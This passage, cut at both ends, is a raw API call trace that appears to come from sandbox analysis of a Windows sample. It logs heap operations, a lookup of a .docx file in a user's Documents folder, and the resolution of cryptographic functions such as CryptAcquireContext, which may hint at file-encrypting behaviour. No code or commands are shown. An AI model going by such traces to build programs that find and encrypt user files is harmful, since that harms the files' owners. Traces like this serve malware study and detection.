returned 0x2e54bf8 [0259.750] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b48 [0259.750] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e698c8 [0259.750] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0259.750] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e558d8 [0259.750] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79310 | out: hHeap=0x970000) returned 1 [0259.750] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0259.750] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0259.750] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0259.750] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0259.751] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0259.751] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0259.751] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0259.751] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0259.751] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54c48 [0259.751] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0259.751] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c68 [0259.751] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514f0 [0259.751] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0259.751] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54b88 [0259.751] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515c8 [0259.751] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0259.751] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0259.751] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51790 [0259.751] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0259.751] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51688 [0259.751] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cf8 [0259.751] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51688 | out: hHeap=0x970000) returned 1 [0259.751] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54530 [0259.751] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51748 [0259.751] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51658 [0259.751] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e544e0 [0259.751] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516a0 [0259.751] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ba8 [0259.752] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516a0 | out: hHeap=0x970000) returned 1 [0259.752] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55a40 [0259.752] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516d0 [0259.752] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516e8 [0259.752] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540a8 [0259.752] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517a8 [0259.752] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c08 [0259.752] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517a8 | out: hHeap=0x970000) returned 1 [0259.752] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54080 [0259.752] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51730 [0259.752] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51700 [0259.752] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54328 [0259.752] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51760 [0259.752] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c88 [0259.752] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517f0 [0259.752] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0259.752] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0259.752] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51898 [0259.752] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c68 [0259.752] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51670 [0259.752] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51808 [0259.752] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cd8 [0259.752] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54210 [0259.752] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51718 [0259.752] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c98 [0259.752] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517a8 [0259.752] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51838 [0259.752] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51898 | out: hHeap=0x970000) returned 1 [0259.752] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541e8 [0259.753] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51670 | out: hHeap=0x970000) returned 1 [0259.753] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517c0 [0259.753] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51778 [0259.753] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ca8 [0259.753] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54508 [0259.753] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51820 [0259.753] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b48 [0259.753] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51820 | out: hHeap=0x970000) returned 1 [0259.753] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54440 [0259.753] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51670 [0259.753] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515e0 [0259.753] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541e8 | out: hHeap=0x970000) returned 1 [0259.753] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0259.753] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0259.753] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517c0 [0259.753] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bd8 [0259.753] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51820 [0259.753] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51688 [0259.753] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c68 [0259.754] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54288 [0259.754] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51868 [0259.754] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cb8 [0259.754] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51880 [0259.754] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51898 [0259.754] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ce8 [0259.754] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0259.754] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51610 [0259.754] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bd8 [0259.754] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0259.754] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51898 [0259.754] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bd8 [0259.754] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents/BDml_a2hzV.docx", lpFindFileData=0x8cf170 | out: lpFindFileData=0x8cf170*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x23faadc0, ftCreationTime.dwHighDateTime=0x1d5eb5b, ftLastAccessTime.dwLowDateTime=0x22475c70, ftLastAccessTime.dwHighDateTime=0x1d5cde3, ftLastWriteTime.dwLowDateTime=0x22475c70, ftLastWriteTime.dwHighDateTime=0x1d5cde3, nFileSizeHigh=0x0, nFileSizeLow=0xa512, dwReserved0=0x0, dwReserved1=0x8cf1b8, cFileName="BDml_a2hzV.docx", cAlternateFileName="BDML_A~1.DOC")) returned 0xa870d0 [0259.754] FindClose (in: hFindFile=0xa870d0 | out: hFindFile=0xa870d0) returned 1 [0259.755] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0259.755] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51898 [0259.755] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bd8 [0259.755] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516b8 [0259.755] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515f8 [0259.755] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0259.755] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54120 [0259.755] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51610 [0259.755] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0259.755] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51640 [0259.755] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51af0 [0259.755] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0259.755] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0259.755] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54490 [0259.755] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bd8 [0259.755] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0259.755] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0259.755] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bd8 [0259.755] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55ca8 [0259.755] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0259.755] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0259.756] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0259.756] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0259.756] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0259.756] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0259.756] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51898 [0259.756] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bd8 [0259.756] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0259.756] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bd8 [0259.756] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0259.756] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55ca8 [0259.756] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bd8 [0259.756] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0259.756] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0259.756] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0259.756] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0259.756] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0259.756] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a78 [0259.756] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bd8 [0259.756] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a00 [0259.757] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519a0 [0259.757] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0259.757] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54350 [0259.757] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518e0 [0259.757] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0259.757] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a90 [0259.757] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51aa8 [0259.757] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0259.757] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b08 [0259.757] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bd8 [0259.757] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0259.758] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bd8 [0259.758] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51928 [0259.758] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a00 [0259.758] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0259.758] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0259.758] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69c28 [0259.758] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a18 [0259.758] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_8", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0259.758] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0259.758] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bd8 [0259.758] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518f8 [0259.758] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518c8 [0259.758] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0259.758] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55ea0 [0259.758] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0259.758] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0259.759] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0259.759] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0259.759] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0259.759] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0259.759] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ad8 [0259.759] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0259.759] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0259.759] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b50 [0259.759] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ad8 | out: hHeap=0x970000) returned 1 [0259.759] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0259.759] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b50 | out: hHeap=0x970000) returned 1 [0259.759] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0259.759] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ad8 [0259.759] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0259.759] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b08 [0259.759] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0259.759] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0259.759] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b50 [0259.759] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b08 | out: hHeap=0x970000) returned 1 [0259.759] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0259.759] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b50 | out: hHeap=0x970000) returned 1 [0259.759] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0259.759] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0259.759] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b08 [0259.760] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0259.760] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0259.760] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b50 [0259.760] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b08 | out: hHeap=0x970000) returned 1 [0259.760] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0259.760] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b50 | out: hHeap=0x970000) returned 1 [0259.760] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0259.760] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0259.760] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b08 [0259.760] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0259.760] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0259.760] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b50 [0259.760] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b08 | out: hHeap=0x970000) returned 1 [0259.760] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0259.760] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b50 | out: hHeap=0x970000) returned 1 [0259.760] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0259.760] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0259.760] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b08 [0259.760] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0259.760] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0259.760] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b50 [0259.760] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b08 | out: hHeap=0x970000) returned 1 [0259.760] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0259.760] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b50 | out: hHeap=0x970000) returned 1 [0259.760] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0259.760] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543a0 [0259.760] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ad8 | out: hHeap=0x970000) returned 1 [0259.760] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0259.760] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ad8 [0259.760] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0259.761] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0259.761] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b50 [0259.761] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ad8 | out: hHeap=0x970000) returned 1 [0259.761] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0259.761] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b50 | out: hHeap=0x970000) returned 1 [0259.761] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0259.761] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b98 [0259.761] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0259.761] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0259.761] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69928 [0259.761] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x2e69928, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0259.761] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b98 | out: hHeap=0x970000) returned 1 [0259.761] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54558 [0259.761] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0259.761] GetProcAddress (hModule=0x756e0000, lpProcName="CryptAcquireContext") returned 0x0 [0259.761] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54558 | out: hHeap=0x970000) returned 1 [0259.761] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0259.761] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0259.761] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55b20 [0259.761] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b08 [0259.761] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0259.761] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, 